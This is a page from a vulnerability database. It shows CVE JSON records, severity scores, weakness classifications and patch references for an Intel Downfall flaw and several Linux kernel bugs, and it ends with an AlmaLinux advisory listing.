https://aws.amazon.com/security/security-bulletin…
https://access.redhat.com/solutions/7027704
https://xenbits.xen.org/xsa/advisory-435.html
https://lists.debian.org/debian-lts-announce/2023…
https://security.netapp.com/advisory/ntap-2023081…
https://www.debian.org/security/2023/dsa-5474
https://www.debian.org/security/2023/dsa-5475
https://lists.fedoraproject.org/archives/list/pac…
https://lists.fedoraproject.org/archives/list/pac…
https://lists.fedoraproject.org/archives/list/pac…
https://lists.debian.org/debian-lts-announce/2023…
https://lists.fedoraproject.org/archives/list/pac…

Impacted products

1 product

Vendor	Product	Version
n/a	Intel(R) Processors	Affected: See references

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T12:28:42.939Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://xenbits.xen.org/xsa/advisory-435.html"
          },
          {
            "name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html",
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downfall.page"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-007/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://access.redhat.com/solutions/7027704"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://xenbits.xen.org/xsa/advisory-435.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230811-0001/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5474"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5475"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OL7WI2TJCWSZIQP2RIOLWHOKLM25M44J/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKREYYTWUY7ZDNIB2N6H5BUJ3LE5VZPE/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00026.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-40982",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-31T20:33:43.011314Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-31T20:43:52.375Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Intel(R) Processors",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "See references"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "information disclosure",
              "lang": "en"
            },
            {
              "cweId": "CWE-1342",
              "description": "Information exposure through microarchitectural state after transient execution",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-08-27T02:06:52.425Z",
        "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
        "shortName": "intel"
      },
      "references": [
        {
          "name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html",
          "url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html"
        },
        {
          "url": "https://downfall.page"
        },
        {
          "url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-007/"
        },
        {
          "url": "https://access.redhat.com/solutions/7027704"
        },
        {
          "url": "https://xenbits.xen.org/xsa/advisory-435.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230811-0001/"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5474"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5475"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OL7WI2TJCWSZIQP2RIOLWHOKLM25M44J/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKREYYTWUY7ZDNIB2N6H5BUJ3LE5VZPE/"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00026.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
    "assignerShortName": "intel",
    "cveId": "CVE-2022-40982",
    "datePublished": "2023-08-11T02:37:05.423Z",
    "dateReserved": "2022-09-27T00:28:29.203Z",
    "dateUpdated": "2025-02-13T16:33:03.126Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-42895 (GCVE-0-2022-42895)

Vulnerability from cvelistv5 – Published: 2022-11-23 14:11 – Updated: 2025-04-21 13:46

Title

Info Leak in l2cap_core in the Linux Kernel

Summary

There is an infoleak vulnerability in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_parse_conf_req function which can be used to leak kernel pointers remotely. We recommend upgrading past commit https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url

Severity

5.1 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-824 - Access of Uninitialized Pointer

Assigner

Google

References

2 references

URL	Tags
https://github.com/torvalds/linux/commit/b1a2cd50…
https://kernel.dance/#b1a2cd50c0357f243b7435a732b…

Impacted products

1 product

Vendor	Product	Version
Linux	Linux Kernel	Affected: 3.0.0 , ≤ b1a2cd50c0357f243b7435a732b4e62ba3157a2e (custom)

Date Public

2022-11-02 23:00

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T13:19:05.390Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/#b1a2cd50c0357f243b7435a732b4e62ba3157a2e"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-42895",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-21T13:36:47.348915Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-21T13:46:05.829Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Linux Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThanOrEqual": "b1a2cd50c0357f243b7435a732b4e62ba3157a2e",
              "status": "affected",
              "version": "3.0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2022-11-02T23:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThere is an infoleak vulnerability in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_parse_conf_req function which can be used to leak kernel pointers remotely.\u003c/span\u003e\u003cbr\u003eWe recommend upgrading past commit\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw1MgsfyPTiSrqqs3LAs-ZRS\"\u003ehttps://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e"
            }
          ],
          "value": "There is an infoleak vulnerability in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_parse_conf_req function which can be used to leak kernel pointers remotely.\nWe recommend upgrading past commit\u00a0 https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url \n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-410",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-410 Information Elicitation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-824",
              "description": "CWE-824 Access of Uninitialized Pointer",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-23T14:14:27.857Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "url": "https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e"
        },
        {
          "url": "https://kernel.dance/#b1a2cd50c0357f243b7435a732b4e62ba3157a2e"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Info Leak in l2cap_core in the Linux Kernel",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-42895",
    "datePublished": "2022-11-23T14:11:33.340Z",
    "dateReserved": "2022-10-12T18:30:19.769Z",
    "dateUpdated": "2025-04-21T13:46:05.829Z",
    "requesterUserId": "ed9b5bb2-2df1-4aa3-9791-5fb260d88e62",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-45869 (GCVE-0-2022-45869)

Vulnerability from cvelistv5 – Published: 2022-11-30 00:00 – Updated: 2025-04-24 18:57

Summary

A race condition in the x86 KVM subsystem in the Linux kernel through 6.1-rc6 allows guest OS users to cause a denial of service (host OS crash or host OS memory corruption) when nested virtualisation and the TDP MMU are enabled.

Severity

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

Assigner

mitre

References

1 reference

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/t…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T14:24:03.200Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47b0c2e4c220f2251fd8dcfbb44479819c715e15"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-45869",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-24T18:57:15.701304Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-362",
                "description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-24T18:57:20.580Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A race condition in the x86 KVM subsystem in the Linux kernel through 6.1-rc6 allows guest OS users to cause a denial of service (host OS crash or host OS memory corruption) when nested virtualisation and the TDP MMU are enabled."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-30T00:00:00.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47b0c2e4c220f2251fd8dcfbb44479819c715e15"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-45869",
    "datePublished": "2022-11-30T00:00:00.000Z",
    "dateReserved": "2022-11-23T00:00:00.000Z",
    "dateUpdated": "2025-04-24T18:57:20.580Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-45887 (GCVE-0-2022-45887)

Vulnerability from cvelistv5 – Published: 2022-11-25 00:00 – Updated: 2025-04-25 19:14

Summary

An issue was discovered in the Linux kernel through 6.0.9. drivers/media/usb/ttusb-dec/ttusb_dec.c has a memory leak because of the lack of a dvb_frontend_detach call.

Severity

4.7 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

Assigner

mitre

References

4 references

URL	Tags
https://lore.kernel.org/linux-media/2022111513182…
https://lore.kernel.org/linux-media/2022111513182…
https://security.netapp.com/advisory/ntap-2023011…
https://git.kernel.org/cgit/linux/kernel/git/torv…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T14:24:03.181Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lore.kernel.org/linux-media/20221115131822.6640-1-imv4bel%40gmail.com/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lore.kernel.org/linux-media/20221115131822.6640-5-imv4bel%40gmail.com/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230113-0006/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=517a281338322ff8293f988771c98aaa7205e457"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 4.7,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-45887",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-25T19:13:39.331748Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-362",
                "description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          },
          {
            "descriptions": [
              {
                "cweId": "CWE-772",
                "description": "CWE-772 Missing Release of Resource after Effective Lifetime",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-25T19:14:57.209Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in the Linux kernel through 6.0.9. drivers/media/usb/ttusb-dec/ttusb_dec.c has a memory leak because of the lack of a dvb_frontend_detach call."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-03-25T00:40:48.719Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://lore.kernel.org/linux-media/20221115131822.6640-1-imv4bel%40gmail.com/"
        },
        {
          "url": "https://lore.kernel.org/linux-media/20221115131822.6640-5-imv4bel%40gmail.com/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230113-0006/"
        },
        {
          "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=517a281338322ff8293f988771c98aaa7205e457"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-45887",
    "datePublished": "2022-11-25T00:00:00.000Z",
    "dateReserved": "2022-11-25T00:00:00.000Z",
    "dateUpdated": "2025-04-25T19:14:57.209Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

alsa-2023:7077

Vulnerability from osv_almalinux

CVE-2021-43975 (GCVE-0-2021-43975)

CVE-2022-28388 (GCVE-0-2022-28388)

CVE-2022-3594 (GCVE-0-2022-3594)

CVE-2022-3640 (GCVE-0-2022-3640)

CVE-2022-38457 (GCVE-0-2022-38457)

CVE-2022-40133 (GCVE-0-2022-40133)

CVE-2022-40982 (GCVE-0-2022-40982)

CVE-2022-42895 (GCVE-0-2022-42895)

CVE-2022-45869 (GCVE-0-2022-45869)

CVE-2022-45887 (GCVE-0-2022-45887)

Tags

Sightings

Nomenclature